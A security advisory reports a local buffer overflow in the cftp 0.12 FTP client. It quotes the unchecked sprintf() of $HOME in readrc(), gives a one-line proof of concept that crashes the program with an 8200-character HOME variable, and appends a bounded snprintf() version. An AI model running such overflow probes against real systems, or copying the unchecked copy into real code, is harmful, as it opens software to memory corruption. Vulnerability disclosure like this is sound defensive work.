[VulnWatch] cftp 0.12 (readrc) Local buffer overflow vulnerability



Description:

CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
A local buffer overflow was found in readrc(): sprintf() writes into a
fixed-size buffer with no length check.
source: http://ftp.giga.or.at/pub/nih/cftp/

Source error:

int
readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp,
       int check_alias)
{
    FILE *f;
    char b[8192], *p, *tok, *q, *home;
    char *user, *pass, *host, *port, *wdir;

    if ((home=getenv("HOME")) == NULL)
        home = "";
    sprintf(b, "%s/.cftprc", home);

    if ((f=fopen(b, "r")) == NULL) {
        if (errno == ENOENT)
            return 0;
        return -1;
    }
    [..]
}

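The error is in the sprintf() call: the length of the string returned by
getenv("HOME") is not checked before it is copied into the 8192-byte
buffer b.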

Proof of concept:

$ export HOME=`perl -e "print 'A'x8200"`
$ cftp
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi
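
A bounded form of the path construction in readrc(), as an added example (not cftp's code and not a fix published by the project). The helper name build_rc_path() is hypothetical; it rejects an over-long HOME instead of writing past the buffer or opening a truncated path.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper (not part of cftp): build "<home>/.cftprc" in out.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG if the result
 * would not fit, so the caller never opens a truncated path. */
int
build_rc_path(char *out, size_t outlen, const char *home)
{
    int n;

    if (out == NULL || outlen == 0) {
        errno = EINVAL;
        return -1;
    }
    if (home == NULL)
        home = "";              /* same fallback as readrc() */

    /* snprintf() writes at most outlen bytes including the NUL and
     * returns the length the full string would have had. */
    n = snprintf(out, outlen, "%s/.cftprc", home);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

int
main(void)
{
    char b[8192];   /* same size as the buffer in readrc() */

    if (build_rc_path(b, sizeof b, getenv("HOME")) != 0) {
        perror("cannot build rc file path");
        return 1;
    }
    printf("rc file: %s\n", b);
    return 0;
}
```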


